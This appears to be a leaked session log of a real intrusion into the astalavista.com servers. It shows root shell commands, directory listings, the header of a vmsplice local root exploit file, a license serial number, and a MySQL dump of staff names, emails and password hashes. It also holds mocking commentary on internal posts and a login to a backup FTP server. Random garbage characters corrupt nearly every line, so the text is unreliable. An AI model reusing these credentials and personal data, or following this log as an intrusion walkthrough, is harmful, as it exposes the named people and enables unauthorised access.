. ? U5 m; K- p' p Rsh-3.2# cd com) S6 O* t) X0 o: _# Z) K
sh-3.2# ls -la
1 U! e9 ]) Z( T. [6 A/ \total 1412084 R. R- @8 T$ d) @
drwx–x–x 10 com com 4096 Apr 28 12:40 .3 a! n" r* z' x: H/ w% Q4 n5 c+ d( |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& S+ ]8 Q. p5 h
drwx—— 2 com com 4096 Jun 4 04:04 backups
7 u- D1 t# h: e" \7 `0 L0 T-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql7 |4 |1 u) i' |& I
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system1 f3 U" M3 i8 U! _0 U+ m
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history9 v# q8 {0 a- S3 p; s4 S& n& ?" U
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout$ W% A' F% f/ G7 }3 b, `6 C5 o5 n
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
" Q' v9 b. [ q/ S& Z7 D, I& Z7 @-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc' ]. P, |0 z8 e+ R% a4 Z1 Y* u
drwx–x–x 3 com com 4096 Jan 29 2008 domains F9 V; D2 s4 S# I
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed" C6 k+ h0 |2 B' R1 Q- ^
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap9 |! n, q) F/ n, q) [3 s" o
-rw——- 1 com com 69 Nov 18 2008 .lesshst
7 l( E4 j( L y6 O8 Ndrwx—— 2 com com 4096 Sep 24 2007 mail
: }* x5 b, q7 [( ?- n+ q. Y9 Y4 {$ w-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
4 N2 @. \- d2 s* Z/ pdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp; F8 u* d. f+ ^2 @+ {2 Z. c
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
' U2 e% e2 M9 r+ ?( P# y-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
' Q- x% Z E: N1 j* Zdrwx—— 2 com com 4096 Aug 26 2008 .ssh
0 W# t Y1 A8 b. i* d! S6 B) K-rwx—— 1 com com 8515 Feb 10 2008 t: C# x0 C/ O& m- Q; P
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
1 R& ~( e0 }( G+ M! p$ F- Zdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp0 Q) J% g+ q/ g! ? Y
-rw-rw-r– 1 com com 617 May 20 2008 .toprc3 A3 x0 Z6 x: c# [0 F! a4 V4 K1 K
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql I/ K. O9 G. |9 I+ [: [- P
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo, d" T- w! j/ M, m8 F& ~
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc4 T% r& { S3 J5 O, b8 s8 O
5 u# ]$ A. r# U7 Gsh-3.2# head t.c
) F, T( y5 y' [, b: @/ c; q/*
3 t9 e# l0 [2 ]4 V# |: N* jessica_biel_naked_in_my_bed.c1 c0 r) p4 ]2 |+ Y
*/ s9 r; Q! A" O- s+ j
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
: L2 ?' O, y' ^" H1 g/ I* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
[0 O; e. I7 n# J3 @1 V6 L0 [* Stejnak je to stare jak cyp a aj jakesyk rozbite.
0 A: f0 C4 P R*6 A5 R- W! m/ R( ]! V4 M! }
* Linux vmsplice Local Root Exploit+ U. H3 t! E1 x/ \+ s7 v' a
* By qaaz! e0 r6 |; x$ o9 Y
*; G- v: ^7 N6 |4 P% ? K
+ _$ I; @( X/ f* Z- K& P8 W
sh-3.2# cd /
) Y0 Q: [( n3 A# L: q: Gsh-3.2# ls -la
7 \4 h* f' n& M! F0 Q5 _( Ntotal 360: M2 O0 J, z2 I$ X5 `* @- S8 s
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. R7 N# l8 o; O7 X) X+ i B
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 w- `+ E. E# N: s
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group. }/ |3 Q3 S9 J
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
( r+ O$ [- L4 X* j F' m-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
1 s8 @/ v% [2 Z3 |8 i! q" e" U-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck$ T# ]7 n# c4 W6 ?6 F: T0 M
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
9 M' P, L2 J' L+ Q6 fdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup1 g; a2 O) z; o5 ?# |- e0 _
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
: ?" v- y3 x- A# H: Adrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
3 U7 Q a4 E& Z9 jdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
5 o9 }: u2 i# cdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc# `# |/ H5 I( L4 W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home6 D, D" r7 K" |+ d
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
! q7 T' e3 K; tdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
# \8 ?& }4 E( a+ {: C( Tdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
# X$ l6 v9 T+ \4 R; }drwx—— 2 root root 16384 Sep 11 2007 lost+found
6 B8 U& h) B' x3 g3 ^( }5 sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
. U3 r7 P! G( z# b2 g0 ndrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
# O5 `! J; q" D @( u+ sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt1 |' b; k2 g8 {" y& b/ X' d
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg/ F1 o1 v2 n0 L3 ]) e
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
( W/ @9 B' W! Z$ \0 Z" c# Mdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt: z! \6 g6 F7 \7 ~: t* C( k/ U
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
$ }8 B: b" ]3 {( adrwxr-x— 15 root root 4096 Jun 4 08:40 root- i5 b; i7 u& [2 ~7 L4 B8 S1 p
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
! q5 @$ G2 G+ P8 ?! C8 Qdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux" A" I4 b4 U: K2 j% l7 d9 N
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
. _5 H, Q; l1 E4 Idrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
/ x; Y& H8 Z8 ]3 G: C4 y: k, hdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
R1 H+ ^% j Gdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
$ R2 d7 m B Y A( L) S6 n6 idrwxr-xr-x 26 root root 4096 Jun 4 03:16 var: d6 t( l# s$ V4 ]1 T+ V, a3 R/ V
; I! [7 Y" y4 {$ ?' b
sh-3.2# cd opt
7 l% I: S9 o2 m5 _$ y4 @sh-3.2# ls -la1 ]9 u2 |4 F2 |! @5 E
total 20; x" P; u$ B# u4 o; x/ @
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .0 r; F% K! D, n$ T- E2 _4 ?/ _, S
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..0 ]1 J- a- y9 H8 x2 W1 j
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws5 H; ^& v0 M' f( k
3 p' l9 b' a/ k; J, N* f* j
sh-3.2# cd lsws/
9 U3 }+ O' P! zsh-3.2# ls -la- P( O2 D5 H3 a; ]9 y+ S% X# j
total 108/ W/ a9 `2 p S) z: T
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
& [9 d. ?7 G+ H3 T0 n2 m1 E5 L. ?drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..& T5 ]9 u3 S, P# O$ _
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
) _1 k& `( R9 C8 jdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
# A. a6 r2 p3 E2 B9 B( n$ c4 bdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate2 l7 z2 N: ~1 q% U
drwxr-xr-x 2 root root 4096 May 29 15:10 bin3 H g9 @& ^+ J2 K, e# P
drwx—— 4 apache apache 4096 Jun 3 02:43 conf" F) P) T) `1 s: K* X& ^# A
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT$ c6 s- V( `0 F3 @$ Z
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs% E2 k; {) U" q+ j2 I
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
9 H2 R- G; X4 Xdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
4 s5 w4 f4 q6 x* l- k-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
, N- E! S( n! l+ P# B' h-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP- c$ Y6 M, R8 }% W, C; J5 y
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
, k2 \8 R( O) b-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP) U2 l- m3 m' `5 H* C7 s2 M/ V8 ]6 C$ C
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
* h$ i, Z2 T3 U3 @* a# {drwxr-xr-x 2 root root 4096 Mar 20 2008 php$ E! X4 y" L; |+ j! m4 i- M; ~
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
* s1 I+ J& n. I( Xdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
: _! n \; }6 T% g! o1 `-rw-r–r– 1 root root 6 May 29 15:10 VERSION
/ B1 g2 ^+ M( x" v5 K/ ?, B
0 p, S& w m7 S; b# Z) hsh-3.2# cd conf: M- Y b4 x* b6 e6 [1 v
sh-3.2# ls -la
- m J, H$ j! S S8 _total 48
) b1 P$ r; G* T& Vdrwx—— 4 apache apache 4096 Jun 3 02:43 .
) p4 g! q0 n3 D7 F- @drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
# l$ {( @ F, T5 |6 c3 Gdrwx—— 2 apache apache 4096 Mar 20 2008 cert( H4 [6 h0 v) @$ ~. b9 U
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
, K# Q# B- Q& C" g3 X% j7 t& Q-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak# ]7 M9 Z4 }7 f! ^& r
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last& d {, l' l, U% v
-rw——- 1 apache apache 256 May 29 15:10 license.key" y7 @9 Q4 E; v9 T3 l7 \, u
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old% n/ i1 u9 H9 W
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
2 M I1 s9 `; Y-rw——- 1 apache apache 20 May 29 15:10 serial.no
8 M1 D, U3 p9 p* V' R. |drwx—— 2 apache apache 4096 Mar 20 2008 templates
& x4 g* @3 n& f* }; L- U2 L! p" [' H& b& W
sh-3.2# cat serial.no3 ~4 O, U3 C7 V3 Y/ H" @% o0 D0 q
IbDl-oVsO-CKqL-wVRa" F* H3 v" i. Y `% Y2 o1 X
' B! o. D6 k* D
sh-3.2# mysql& d9 a% {( }8 D4 _6 u$ M
Welcome to the MySQL monitor. Commands end with ; or \g.8 [3 Q6 k5 u7 }, e; A1 W" U
Your MySQL connection id is 286844. |4 S8 I, |& Z) i/ V( f# Q
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& L+ k* f, y; i% D+ |$ D% L3 F6 Q
1 x0 A, N% C1 f; y+ K
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
2 ~9 j n \. r
; F4 x4 y7 l9 p7 V f# imysql> show databases;" s% A9 }8 a/ }) f0 a/ p
+———————–+: {: N5 ]" H; g! h" e
| Database |& `( w/ @5 Z. ?) q2 m5 i
+———————–+
# W! H; ?$ r' |: Q# t| information_schema |$ U0 [' z! t4 Y# x @+ E& a
| astanet_ads |/ z' T. B5 [9 m C
| astanet_mailing_lists |
! c1 D. m8 I; f, P k| astanet_mediawiki |
+ e% w- |3 u* l9 ~; H0 u| astanet_membersystem |
8 s; _2 ]1 s" _5 x& B5 J4 s| com_contrexx |% v% G) R- J) k6 y9 f+ H& N
| com_contrexx2 |
! u" t+ t" e1 M9 |5 y9 B9 b6 P| com_contrexx2_live |5 w- Y% l* G: I- N
| da_roundcube |/ x- N5 v a$ }. v0 |; ~2 P
| dolphin |
2 b+ Y M3 N7 L" F- P| ideapool |
5 N! \: h# l& ~| mysql |
; M5 w% B# X( |3 r( i+ H7 r3 @" || test |3 n+ i+ v# f( p" U. E
| yourmaster |
2 X. ]/ @5 g1 a7 ?3 ]+———————–+: f! X9 s8 F9 I
14 rows in set (0.00 sec)" d. ~; l! i7 i5 H2 L
& u& z/ n: C/ |9 J; v4 Imysql> use ideapool- Z! d- P; l$ `% _9 y1 }1 X; U
Database changed- I& Y! [, W4 f. [1 H* b
mysql> show tables;
! G$ v+ A! E7 \& `5 V+———————————–+
- ^* j) H6 J4 T! d| Tables_in_ideapool |2 \" K0 W& F A# D# ~
+———————————–+
# _9 V, _+ O% }: ?. l O/ p9 h% p| eventum_columns_to_display |0 z a1 G5 y' T6 ?; p) B l
| eventum_custom_field |4 z5 V- _8 O: T Q% G2 G- C
| eventum_custom_field_option |
7 o, _ [9 N. Y% \| eventum_custom_filter |; J$ s! w3 L- q, c: c
| eventum_customer_account_manager |) O0 M' e9 h& P* o! M9 g- J
| eventum_customer_note |% p! P, ^6 a2 K" {. g5 y( s2 [% [
| eventum_email_account |6 x% i; o0 s, I3 x; [6 E
| eventum_email_draft |& }; w# M% t! u$ D
| eventum_email_draft_recipient |
1 q7 V. p1 s! [7 X5 d% M| eventum_email_response |9 t9 r, y; [' `# `! c
| eventum_faq |% Y- Y4 i" Z6 R1 W( T3 {
| eventum_faq_support_level |7 e" k' R: G' _0 g
| eventum_group |
3 @& j3 Z. F$ |" u- T+ `& O| eventum_history_type |* e0 j, J- t7 A0 S( E2 v
| eventum_irc_notice |4 s6 h; H6 @2 x/ L; p g) U: I/ m) R5 E
| eventum_issue |6 Z z1 s9 D+ ]) F
| eventum_issue_association |. J$ p9 I! [4 R% J! [
| eventum_issue_attachment |0 b- @. D& M$ k9 F& a8 ^
| eventum_issue_attachment_file |
2 U' l2 A; W: R9 [| eventum_issue_checkin |6 W7 m/ m+ C$ W6 C! e) y
| eventum_issue_custom_field |& M; v, _1 l! T# \: b- z& h
| eventum_issue_history |
( |; ~ n( J4 ~. q" K I| eventum_issue_quarantine |
, b' `9 L5 H9 G4 O0 Y4 L2 n1 A: X| eventum_issue_requirement |" v/ a" K7 r7 v4 h# D
| eventum_issue_user |
( U' A8 G0 [/ R2 P| eventum_issue_user_replier |
7 [0 {9 u! I. v$ x9 [" y| eventum_link_filter |& _ x5 G2 o) @/ j9 ]# V# {" |
| eventum_mail_queue |
8 r4 ~6 W$ }. d! w) d$ W| eventum_mail_queue_log |
+ [2 D0 h/ J* j! Z1 ^| eventum_news | D F1 N5 S: X) G( Q
| eventum_note |
, a% q. Y6 r( B, J, Y: A2 V| eventum_phone_support |
7 x s) G6 o& a6 k+ F" ~5 U# @! l! H| eventum_project |
0 I( t3 x( \# H5 z9 C7 e| eventum_project_category |# N( q7 r3 y& d& T, `( {
| eventum_project_custom_field |: {/ F( s" R8 `8 P% O
| eventum_project_email_response |, c4 y6 f% r( K: `
| eventum_project_field_display |! @% Z+ L- x" |+ R7 O4 y- s8 d
| eventum_project_group |1 Q) \! V8 J& a. a- A( p/ d+ y
| eventum_project_link_filter |/ G7 I, W7 h6 P
| eventum_project_news |- R- f2 @ F. f e
| eventum_project_phone_category |3 n! z# W9 Z* a. H5 C7 t4 B
| eventum_project_priority |
8 k" C* o- R, Z| eventum_project_release |
7 q o% B# y: y o3 `| eventum_project_round_robin |5 I2 C: r% q! n% M& {, v
| eventum_project_status |
" ], ?+ a* L) @( X3 f+ ?, C| eventum_project_status_date |
# X2 r' m4 b) N0 F| eventum_project_user |) _. l" J1 _% _5 p. Z+ k2 M$ x
| eventum_reminder_action |. I( k7 R C) i( p0 g7 R+ L
| eventum_reminder_action_list |
/ w4 m) M9 {& _. b5 u1 {$ J| eventum_reminder_action_type |
P/ E- B1 z, E3 A) o| eventum_reminder_field |
/ l5 a3 e) M0 }; x| eventum_reminder_history |$ R3 J4 N9 ^9 ^7 z- B
| eventum_reminder_level |. A; y2 w8 Z4 W- g( k7 H" _
| eventum_reminder_level_condition |) E1 X3 i3 A9 h* I& L+ N5 C0 u
| eventum_reminder_operator |
# v! g7 {) N. h9 C| eventum_reminder_priority |
% o J+ e c' L| eventum_reminder_requirement |! [' A% @; n. v& W
| eventum_reminder_triggered_action |
0 U% l& y. }" O8 B9 e- }$ q* N" v| eventum_resolution |1 l- E/ @! \3 v$ Z0 Q. ~9 t9 W
| eventum_round_robin_user |
& J9 T# Y/ R# b. P5 j; t) c| eventum_search_profile |
- l" ^0 ]1 {/ h- g- f; M9 ~| eventum_status |7 p5 M$ J8 X8 `/ r
| eventum_subscription |4 C7 r, k h( g8 Q a
| eventum_subscription_type |
2 ?9 k+ r5 U$ |. n5 B| eventum_support_email |6 T$ e3 y( E+ b$ J( A
| eventum_support_email_body |
0 b' m6 \0 E+ C| eventum_time_tracking |
* V. P1 ~" E% o| eventum_time_tracking_category |
" N( `9 t; y: T( B2 L& g| eventum_user |5 x" `! D, }9 {: o, r2 J. h+ L
+———————————–+/ v! N: j0 ~5 ]6 _
69 rows in set (0.00 sec)1 e, ?, ^0 @) i& O. P" k. k' Q8 c
/ T* ~+ h7 ?! y% q" s
mysql> describe eventum_user;- \7 }" I9 {8 i/ U6 w
+————————-+——————+——+—–+———————+—————-+# B0 I" q! N2 g/ s
| Field | Type | Null | Key | Default | Extra |
! J" W; N5 @/ }) E" a8 R8 X+————————-+——————+——+—–+———————+—————-+
2 @' k5 D6 s5 P9 d| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |- R |/ \2 ?+ m: L" j
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |+ U" Q3 k+ Y4 @
| usr_customer_id | int(11) unsigned | YES | | NULL | |( s3 [2 Z( `. W+ R) f! ~
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |( t4 c, S* m6 P4 `$ d" R, h
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |& k- }1 O/ K4 U8 P; b
| usr_status | varchar(8) | NO | | active | |& w) q# e; G. S: a
| usr_password | varchar(32) | NO | | | |
+ `% a6 h) {' j% _: w* K: e: X5 m| usr_full_name | varchar(255) | NO | | | |
6 L: i3 w' t, c| usr_email | varchar(255) | NO | UNI | | |: D% p4 M# {' w6 g4 y5 y
| usr_preferences | longtext | YES | | NULL | |
8 |/ C. q, ^% S# x+ e* q F| usr_sms_email | varchar(255) | YES | | NULL | | O" h. [8 ^' X% t8 ]$ [
| usr_clocked_in | tinyint(1) | YES | | 0 | |
" u4 A! a& P. u& E| usr_lang | varchar(5) | YES | | NULL | |
6 A- J$ _" |& j: ~$ ]+————————-+——————+——+—–+———————+—————-+ [9 I8 w! c' x* F
13 rows in set (0.00 sec)
% f8 I: I# g7 U! F, Z3 t
+ d: o1 L$ I& vmysql> select usr_full_name,usr_email,usr_password from eventum_user;
& A4 x5 Y$ n q4 h+———————-+——————————-+———————————-+
. r1 ?3 ~9 S2 ^7 n& `, j4 A5 t| usr_full_name | usr_email | usr_password |. r* k6 ^6 ~+ G8 N9 Z* r$ i
+———————-+——————————-+———————————-+/ J+ v& d6 ` a8 q
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
9 q; _' e& c/ A| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |: o: u+ m1 r9 R6 ?* Q8 o
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
, g$ m6 U) e7 y$ M- a. Q| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
' y5 k/ G+ T z( l: Q* @| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |: Y0 J# g$ \, j& Y, }. x0 q- _
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |0 x' e, R' j& g7 O! }3 N
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
) d8 s, K: |/ X' ?+ ?| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
' G3 g5 z0 M1 d$ |: f| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
0 z# L! b$ ~/ J+ \- M* w; \( f/ [| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |- Q; @; U# f" a! h3 ~" ?
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |+ ]& ]. s. f% n$ W% B9 M) u% u
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |- q9 M6 Q+ }- X% g1 Q: B3 N
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |3 _8 b+ I6 S* S7 @
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |8 E, o' o2 K3 Q; N: ^* W% i
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
; S* Q1 Y: H% c7 e' ?: }! g& @+———————-+——————————-+———————————-+
3 N9 {9 A" d$ {+ J2 w15 rows in set (0.00 sec)
. w7 l& p- Q8 f5 Q- p$ G; M6 h+ T! X( M: g+ f- D" n
mysql> select iss_description from eventum_issue where iss_id = 43;
, H1 k8 S9 G' r- h+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
, T$ k& o. s* C# ~- T| iss_description * p2 s3 o3 z$ O$ t& [* t
|
+ k" s+ W) w8 M! I! m" u8 [; k4 @+ p+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+, E: S2 A0 K+ t
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
" p+ p: E. g' F% [; hconnected for 90 mins… 120mins… so what i propose is something like:" l7 ^. S2 [5 y/ c p8 T" _5 W5 B
链接标记[url]http://www.surfthechannel.com/[/url]. x% Z* j. T& A4 L% t0 T- t; {) [
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system. h3 S& Z$ T$ U3 W* N, u$ z% B
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t6 j; x( L+ K4 k8 o
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off/ v/ w* X' q9 L7 a' A8 y3 U
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
2 B- [4 \( `# a9 T% G
, M: c. G$ R5 l% H6 jWe could also put advertisement during play on the flash video player itself… extra $$…# J4 p+ \5 U8 M5 s' [% X# s# W) O
) ?& B$ g |7 v, j+ K A
By sykadul |8 G4 h' o) z# s
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+) m. X2 [1 i4 S
1 row in set (0.00 sec)
* S# X+ u3 k! g5 m) ~
9 _/ e4 [0 }9 r( R5 H: t5 ]! l// Money and extra $$ is all they care about. remember that. k7 R8 i" b( M- q
+ b: o( I+ C! k2 ? b& x9 R* _8 p; O
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;. Y8 S( A# \6 R5 r) q8 J
+————————+——————————————————————————————————————————————————————————————————————————————-+- r2 W% ? O. o
| iss_summary | iss_description
3 t! y* P7 l7 E" C4 W|; W8 ?6 C; P1 s4 O0 z% z) U( X
+————————+——————————————————————————————————————————————————————————————————————————————-+
8 z x6 Z& s% { N1 r| Forum for REAL EXPERTS | Hello,
1 d# t0 R, J( y* H: y
: F }, E/ c, N/ r+ ?0 }9 xIshtus and I,& Z$ \$ K6 `- i# x8 ]
- p8 W0 w5 P* ~0 P* a: ?& u' aCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
9 q+ U2 }- g0 r, T( r7 @ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..) ]; X! h+ D2 O
! K6 {; @" g& b f' x4 K5 NOne example a friend of mine from coresecurity.com!% R( k7 w, S1 a. x
, Y4 g7 Z+ z5 [: g6 cWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..) z+ V$ ^1 f; {. ^
6 `. i' [$ @4 ]) S, p7 Q|
' y* B! @/ ~% q6 h+————————+——————————————————————————————————————————————————————————————————————————————+) `% d( o; v2 M% k2 C2 w
1 row in set (0.00 sec). I! S( X3 e$ n( E
. Q9 M3 W9 j9 g9 u
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
. c8 d+ t) P6 V0 y2 {* X. J5 ^' n
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
& ~1 y7 i ^! Q2 X9 v+——————+———————————————————————————————+. D1 I1 z# K8 ]& T9 b
| iss_summary | iss_description |' N6 u) J, B: L; H
+——————+———————————————————————————————+: M; r# S& ~4 t# Z9 C. o: U# L, K
| Website guidance | Virtual Girl which guides you trought the website." c. D5 y* L; J* S4 Q
: G9 {5 c- p2 ^$ Q4 {" }
We need a girl with who you can ( talk )!!!
$ A5 B) O6 j. c7 Q! y0 o/ mAlso for the News!: `" b# g0 o/ u0 b ^
So my suggestion is a girl who read you the news loud if you like!2 s% K! H" C( z% I. b
you can choose between read yourselfe or she read it for you or both!
$ [: R* j4 H. Y: Y4 g
$ p4 @1 r1 i N9 y: pGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!+ d% t, |0 z: W4 n' W
4 J( J$ e3 m9 y2 m
Have a look on the example girls!!
9 Y1 u/ }; c/ l' |5 [& d% g+ P7 y4 f, A+ h' v, O
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]9 l1 ?% m1 ^% [7 w/ @6 Z2 N+ W
6 G5 ~. ]: ~* z9 p0 d
or that- M, V3 @! s& y6 F. g6 `! U
. \0 \# z& D& v$ t& j5 M! g链接标记[url]http://www.yellostrom.de/[/url]
8 f& d; b! g! N! L& {
+ M1 A! [( w/ V/ _) o( X|' B& G& q7 K1 I) V8 S6 a1 v
+——————+———————————————————————————————+" \6 }1 Z1 p0 N& \5 M
1 row in set (0.00 sec)
- ^: m1 m- T- S$ {! l+ t
/ r0 S* @) v) V) J6 p; n( f; f! q// ha ha.) X' C0 w- G6 C& p! y6 T
9 ?% ]' o3 ?9 \4 T) c; w4 G8 B
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;* n7 b8 u7 d) E" ~' G. H
+————————–+———————————————————————————————————–+! ^1 O4 z" l2 i
| iss_summary | iss_description |# m5 Q7 K" e: V" \
+————————–+———————————————————————————————————–+
# O% o2 A z/ x( |. Y4 q- D1 q| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |0 [' H8 M& W, N7 ^$ ^4 h
+————————–+———————————————————————————————————–+
8 r, c/ ^' X) g" M1 row in set (0.00 sec)
! T2 r4 b7 ]. P4 ]
; d$ W6 }, I/ N! j4 A! P// LOL.2 b6 r2 v' V7 e" [- H
- f1 [# ^2 W( f- N" I7 |
mysql> exit
+ X( S3 s$ K9 J a; Z/ nBye5 z) H/ m9 V2 g3 u/ i
* k) D* s( b. P) H
sh-3.2# ftp 212.254.194.163) y8 h# g. u8 J# ?2 z4 {3 ?
Connected to 212.254.194.163.# o# B/ F6 }2 w8 H' p4 p3 ^9 X
220 BackupCOM_VW FTP server ready.1 |- b- l, x h; K4 f
504 AUTH: security mechanism ‘GSSAPI’ not supported. u% I+ _0 |1 s5 T' F% v0 ^
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
( _# F& L; J2 \; n6 QKERBEROS_V4 rejected as an authentication type
9 y* B+ \. r4 h' @7 OName (212.254.194.163:root): astalavista.com7 _) k. j- ~' D! n V6 o6 L
331 Password required for astalavista.com.
% u2 X4 @. }# [! } @Password:! c, v% A% g" \5 {
230 User astalavista.com logged in.. p0 K1 u; {, `' a
Remote system type is UNIX.
# u0 ]- J. Y7 I5 O+ p2 rUsing binary mode to transfer files.( [ u Z: I; @9 ]: P$ E1 J" Z
ftp> ls -la" l" \! f! B/ F6 Y
227 Entering Passive Mode (212,254,194,163,2,188)
& n9 K# I# h6 u$ ^+ v. }2 ?150 Opening BINARY mode data connection for ‘file list’.0 M& x6 q0 X+ u4 ~2 c* M
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
/ [( B1 A1 \& S5 G1 q$ a9 G3 H% L226 Transfer complete.6 }$ y% ]% z, m. `4 G3 E3 F) [
ftp> cd astalavista.com. E0 L4 o P. ?
250 CWD command successful.
; p8 U6 e0 ?. rftp> ls -la1 w1 k0 w) R6 X5 _
